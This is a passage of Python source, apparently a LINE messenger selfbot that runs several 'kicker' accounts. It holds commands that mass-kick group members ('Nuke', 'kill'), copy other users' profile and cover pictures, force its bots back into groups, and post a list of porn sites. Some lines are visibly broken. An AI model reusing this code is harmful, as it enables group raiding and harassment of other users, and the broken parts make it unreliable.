1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1\n\nMakasih Sudah Dilihat :)\nJangan Dikick ampun mzz :v")
elif ".music" in msg.text.lower():
songname = msg.text.lower().replace(".music","")
params = {"songname":" songname"}
r = requests.get('https://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
cl.sendMessage(msg.to, song[4])
elif ".Youtube " in msg.text:
query = msg.text.replace(".Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'http://www.youtube.com' + a['href'] + a['title'])
elif "Block @" in msg.text:
if msg.toType == 2:
print "[block] OK"
_name = msg.text.replace("Block @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.blockContact(target)
cl.sendText(msg.to, "Success block contact~")
except Exception as e:
print e
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
#===============================================
elif msg.text in ["Invite","ดึง"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"send contact 😉")
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif msg.text in ["Mid","ไอดี"]:
cl.sendText(msg.to,mid)
elif msg.text in ["Link on","เปิดลิ้ง"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off","ปิดลิ้ง"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close👈")
else:
cl.sendText(msg.to,"URL close👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl","ลิ้ง"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["S1glist"]:
gs = ki.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki.getGroup(i).name + " | [ " + str(len (ki.getGroup(i).members)) + " ]")
ki.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S2glist"]:
gs = ki2.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki2.getGroup(i).name + " | [ " + str(len (ki2.getGroup(i).members)) + " ]")
ki2.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S3glist"]:
gs = ki3.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki3.getGroup(i).name + " | [ " + str(len (ki3.getGroup(i).members)) + " ]")
ki3.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S4glist"]:
gs = ki4.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki4.getGroup(i).name + " | [ " + str(len (ki4.getGroup(i).members)) + " ]")
ki4.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S5glist"]:
gs = ki5.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[���] %s \n" % (ki5.getGroup(i).name + " | [ " + str(len (ki5.getGroup(i).members)) + " ]")
ki5.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text == "ลิ้ง":
ki.sendText(msg.to,"nekopoi.host")
ki.sendText(msg.to,"sexvideobokep.com")
ki.sendText(msg.to,"memek.com")
ki.sendText(msg.to,"pornktube.com")
ki.sendText(msg.to,"faketaxi.com")
ki.sendText(msg.to,"videojorok.com")
ki.sendText(msg.to,"watchmygf.mobi")
ki.sendText(msg.to,"xnxx.com")
ki.sendText(msg.to,"pornhd.com")
ki.sendText(msg.to,"xvideos.com")
ki.sendText(msg.to,"vidz7.com")
ki.sendText(msg.to,"m.xhamster.com")
ki.sendText(msg.to,"xxmovies.pro")
ki.sendText(msg.to,"youporn.com")
ki.sendText(msg.to,"pornhub.com")
ki.sendText(msg.to,"anyporn.com")
ki.sendText(msg.to,"hdsexdino.com")
ki.sendText(msg.to,"rubyourdick.com")
ki.sendText(msg.to,"anybunny.mobi")
ki.sendText(msg.to,"cliphunter.com")
ki.sendText(msg.to,"sexloving.net")
ki.sendText(msg.to,"free.goshow.tv")
ki.sendText(msg.to,"eporner.com")
ki.sendText(msg.to,"Pornhd.josex.net")
ki.sendText(msg.to,"m.hqporner.com")
ki.sendText(msg.to,"m.spankbang.com")
ki.sendText(msg.to,"m.4tube.com")
ki.sendText(msg.to,"brazzers.com")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Speed" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif "Sp" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki4.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki5.sendText(msg.to, text)
profile = ki5.getProfile()
#------------------------------------------------------------------
elif "Steal home @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Steal home @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif "Blacklist @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Blacklist @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"Error")
elif "Blacklist all" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Blacklist all","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Semua Telah Di Hapus")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Maaf")
else:
for target in targets:
if not target in Bots:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sentText(msg.to,"Berhasil Dihapus")
elif "Whitelist @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Whitelist @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif "Blacklist: " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Blacklist: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Whitelist: " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Whitelist: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["cb","���้างดำ"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Whitelist","ขาว"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Blacklist","ดำ"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","เชคดำ"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text.lower() == 'kill':
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Nuke" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Nuke","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
cl.sendText(msg.to,"Masih Mauko Sundala")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ada Member")
ki2.sendText(msg.to,"Nothing Bosqu")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg,to,"Hahaha")
ki2.sendText(msg,to,"Fakyu Sundala")
#-----------------------------------------------
#-----------------------------------------------
elif "Kicker" in msg.text:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
ki2.acceptGroupInvitationByTicket(msg.to,Ti)
ki3.acceptGroupInvitationByTicket(msg.to,Ti)
ki4.acceptGroupInvitationByTicket(msg.to,Ti)
ki5.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#-----------------------------------------------
elif msg.text in ["Sayang","Kuy","All join","Minna"]:
if msg.from_ in admsa:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text.lower() == 'spcome':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "As1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "As2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "As3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "As4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "As5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["คิกออก","Bye","กุเกลียดมึง","Sayonara"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"ไปก็ได้ บ๊ายบาย " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
